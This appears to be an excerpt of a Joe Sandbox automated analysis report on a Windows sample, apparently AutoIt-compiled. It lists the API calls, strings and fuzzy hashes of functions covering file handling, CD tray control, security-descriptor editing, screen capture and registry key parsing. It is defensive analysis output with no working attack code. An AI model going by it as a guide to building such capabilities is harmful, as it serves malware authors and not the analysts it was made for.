                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                                                                  • String ID: .dll$.exe$.icl
                                                                                                                  • API String ID: 3907162815-1154884017
                                                                                                                  • Opcode ID: bf5db6533338f80d67fb17623c9f37366ddc9b27856286ed4ed4abfb306f0734
                                                                                                                  • Instruction ID: 285df566f7817b13d84e03a840c4393e8f2bc99fd2895d50fcde57fd0d01e7c5
                                                                                                                  • Opcode Fuzzy Hash: bf5db6533338f80d67fb17623c9f37366ddc9b27856286ed4ed4abfb306f0734
                                                                                                                  • Instruction Fuzzy Hash: AB61CE71540219BEEB14EF64DC46FBE7BA9EB08714F108206F915EA2D0EB74D980D7B0
                                                                                                                  APIs
                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00DC0EFF
                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00DC0F0F
                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DC0F1B
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DC0F79
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0F91
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0FA3
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00DC0FB8
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC0FCC
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC0FFE
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC101F
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC102B
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DC106A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 3566783562-438819550
                                                                                                                  • Opcode ID: c1a9c196d19ab2b94228bf95e9b6c7809385235d41694fb1bb6aca4604791c0a
                                                                                                                  • Instruction ID: 1be86729368942b392d6b10a182b1ebff9ba8bf2d24dfaa4ae8eda8586c1fc01
                                                                                                                  • Opcode Fuzzy Hash: c1a9c196d19ab2b94228bf95e9b6c7809385235d41694fb1bb6aca4604791c0a
                                                                                                                  • Instruction Fuzzy Hash: 65615EB5504306AFC710EF64C845E9AB7E9FF89310F04891EF98987251EB31E945CBB2
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00DBDB26
                                                                                                                  • GetDriveTypeW.KERNEL32 ref: 00DBDB73
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBDBBB
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBDBF2
                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DBDC20
                                                                                                                    • Part of subcall function 00D77E53: _memmove.LIBCMT ref: 00D77EB9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                  • API String ID: 2698844021-4113822522
                                                                                                                  • Opcode ID: 95587d882ea1b7feeeefd276c0fa787d510f5c15244c11a1d8c5d7056795d0ff
                                                                                                                  • Instruction ID: b1c435f177fd385e14350fedd257f8ac57024588b51fae54bec2a489a80dfd26
                                                                                                                  • Opcode Fuzzy Hash: 95587d882ea1b7feeeefd276c0fa787d510f5c15244c11a1d8c5d7056795d0ff
                                                                                                                  • Instruction Fuzzy Hash: FB513A711043059FC700EF20D88296AB7F5EF88718F14886DF89AA7261EB71EE05CF62
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DE4085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00DB3145
                                                                                                                  • LoadStringW.USER32(00000000,?,00DE4085,00000016), ref: 00DB314E
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00DE4085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00DB3170
                                                                                                                  • LoadStringW.USER32(00000000,?,00DE4085,00000016), ref: 00DB3173
                                                                                                                  • __swprintf.LIBCMT ref: 00DB31B3
                                                                                                                  • __swprintf.LIBCMT ref: 00DB31C5
                                                                                                                  • _wprintf.LIBCMT ref: 00DB326C
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DB3283
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                  • API String ID: 984253442-2268648507
                                                                                                                  • Opcode ID: 7b191d5eabbec280c4bf5b8083bb69efa366832334668ada97896d0fa6d38095
                                                                                                                  • Instruction ID: a0d485e33cff02180a952b93904bb61f029ca7761366fcfbf73d601881db63f9
                                                                                                                  • Opcode Fuzzy Hash: 7b191d5eabbec280c4bf5b8083bb69efa366832334668ada97896d0fa6d38095
                                                                                                                  • Instruction Fuzzy Hash: C5413F7294021DBACB14FBE0DD87EEEB779EF14701F104069B206B20A2EA656F04DB71
                                                                                                                  APIs
                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00DBD96C
                                                                                                                  • __swprintf.LIBCMT ref: 00DBD98E
                                                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DBD9CB
                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DBD9F0
                                                                                                                  • _memset.LIBCMT ref: 00DBDA0F
                                                                                                                  • _wcsncpy.LIBCMT ref: 00DBDA4B
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00DBDA80
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DBDA8B
                                                                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00DBDA94
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DBDA9E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                  • API String ID: 2733774712-3457252023
                                                                                                                  • Opcode ID: 241ab72854ddeac594ac19da4f92cadd26b708a74a5e3fc9790de41964ab8e2c
                                                                                                                  • Instruction ID: 14f56329caf69620bab20aeaec4a639e5be411d49a0a003ec0b920c547d54f98
                                                                                                                  • Opcode Fuzzy Hash: 241ab72854ddeac594ac19da4f92cadd26b708a74a5e3fc9790de41964ab8e2c
                                                                                                                  • Instruction Fuzzy Hash: 29319472600209AADF20DFA4DC49FEE77BEEF84700F1481A5F559D2161EB709A41CBB1
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00DDBD04,?,?), ref: 00DDE564
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE57B
                                                                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE586
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE593
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00DDE59C
                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE5AB
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00DDE5B4
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00DDBD04,?,?,00000000,?), ref: 00DDE5BB
                                                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DDE5CC
                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DFD9BC,?), ref: 00DDE5E5
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 00DDE5F5
                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00DDE619
                                                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00DDE644
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DDE66C
                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DDE682
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3840717409-0
                                                                                                                  • Opcode ID: 2ad7e964859bba28ed7a2a5c55eee010316f2badc1086bf0ace423b583e76478
                                                                                                                  • Instruction ID: 2c0d3a8d7d090ad3935b8a0ff40fd253f4b5a52b11cf9206a7625c5546c5d08c
                                                                                                                  • Opcode Fuzzy Hash: 2ad7e964859bba28ed7a2a5c55eee010316f2badc1086bf0ace423b583e76478
                                                                                                                  • Instruction Fuzzy Hash: F2414875600308AFDB11AF64DC88EAEBBBAEB89715F108459F906DB3A0D7309D41DB70
                                                                                                                  APIs
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DC0C93
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0CAB
                                                                                                                  • _wcscat.LIBCMT ref: 00DC0CBD
                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00DC0CD2
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC0CE6
                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00DC0CFE
                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00DC0D18
                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00DC0D2A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                  • String ID: *.*
                                                                                                                  • API String ID: 34673085-438819550
                                                                                                                  • Opcode ID: 84b1b9ee47ba0ed6df6bb04f223756098ef4e9ce0402093d6a8b0418982a0548
                                                                                                                  • Instruction ID: dacadcf564931e7631b3482222201cf3b97f19d04c55d565368451bf735b0bba
                                                                                                                  • Opcode Fuzzy Hash: 84b1b9ee47ba0ed6df6bb04f223756098ef4e9ce0402093d6a8b0418982a0548
                                                                                                                  • Instruction Fuzzy Hash: 27816371504306DFCB64DF64C944EAABBE9AB88314F18892EF48AC7251E634DD85CB72
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DAB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DAB903
                                                                                                                    • Part of subcall function 00DAB8E7: GetLastError.KERNEL32(?,00DAB3CB,?,?,?), ref: 00DAB90D
                                                                                                                    • Part of subcall function 00DAB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00DAB3CB,?,?,?), ref: 00DAB91C
                                                                                                                    • Part of subcall function 00DAB8E7: RtlAllocateHeap.NTDLL(00000000,?,00DAB3CB), ref: 00DAB923
                                                                                                                    • Part of subcall function 00DAB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DAB93A
                                                                                                                    • Part of subcall function 00DAB982: GetProcessHeap.KERNEL32(00000008,00DAB3E1,00000000,00000000,?,00DAB3E1,?), ref: 00DAB98E
                                                                                                                    • Part of subcall function 00DAB982: RtlAllocateHeap.NTDLL(00000000,?,00DAB3E1), ref: 00DAB995
                                                                                                                    • Part of subcall function 00DAB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00DAB3E1,?), ref: 00DAB9A6
                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DAB5F7
                                                                                                                  • _memset.LIBCMT ref: 00DAB60C
                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DAB62B
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00DAB63C
                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00DAB679
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DAB695
                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00DAB6B2
                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00DAB6C1
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00DAB6C8
                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DAB6E9
                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00DAB6F0
                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DAB721
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DAB747
                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DAB75B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2347767575-0
                                                                                                                  • Opcode ID: 0c9da5d2e1905bd90aaeef34d0c5ef1f453fb507434a8fc0f92c95d735dc7b76
                                                                                                                  • Instruction ID: 87b624be4919855857fdb78bca56742d8db7aa4d6a6ffd08ef65758caa965053
                                                                                                                  • Opcode Fuzzy Hash: 0c9da5d2e1905bd90aaeef34d0c5ef1f453fb507434a8fc0f92c95d735dc7b76
                                                                                                                  • Instruction Fuzzy Hash: 10515C75900209AFDF009FA4DC45EEEBB7AFF45314F04816AE915EB292DB749A06CB70
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 00DCA2DD
                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00DCA2E9
                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 00DCA2F5
                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00DCA302
                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00DCA356
                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00DCA392
                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00DCA3B6
                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 00DCA3BE
                                                                                                                  • DeleteObject.GDI32(?), ref: 00DCA3C7
                                                                                                                  • DeleteDC.GDI32(00000006), ref: 00DCA3CE
                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00DCA3D9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                  • String ID: (
                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                  • Opcode ID: e3d63a70726cc3496cf2cca84f9500c8a151cb1290d485b5a76bf89514fe5625
                                                                                                                  • Instruction ID: a879ebe7e6364a57781f7c6c3929487986abb172f8a51c31ae2613cd42ee5e11
                                                                                                                  • Opcode Fuzzy Hash: e3d63a70726cc3496cf2cca84f9500c8a151cb1290d485b5a76bf89514fe5625
                                                                                                                  • Instruction Fuzzy Hash: 61513975900349AFCB15CFA8DC88EAEBBBAEF48310F14851DF995A7350C731A841CB60
                                                                                                                  APIs
                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharUpper
                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E
                                                                                                                  • API String ID: 3964851224-875377453
                                                                                                                  • Opcode ID: ee404bb82442b8e175db49f5497d62b2a59c621480a9107cdf9809ffabf6ecc1
                                                                                                                  • Instruction ID: 6d81fda60d92f68b403b5cbf9555b682ef5ceeac1c0977699bae35bf31dda350
                                                                                                                  • Opcode Fuzzy Hash: ee404bb82442b8e175db49f5497d62b2a59c621480a9107cdf9809ffabf6ecc1
                                                                                                                  • Instruction Fuzzy Hash: DB416FB416035A8BDF04EF18E841BEA3365EF55350F184826EC916B395DB70DE19CB72
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00DE3C64,00000010,00000000,Bad directive syntax error,00E0DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00DB32D1
                                                                                                                  • LoadStringW.USER32(00000000,?,00DE3C64,00000010), ref: 00DB32D8
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                  • _wprintf.LIBCMT ref: 00DB3309
                                                                                                                  • __swprintf.LIBCMT ref: 00DB332B
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DB3395
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"
                                                                                                                  • API String ID: 1506413516-3476811254
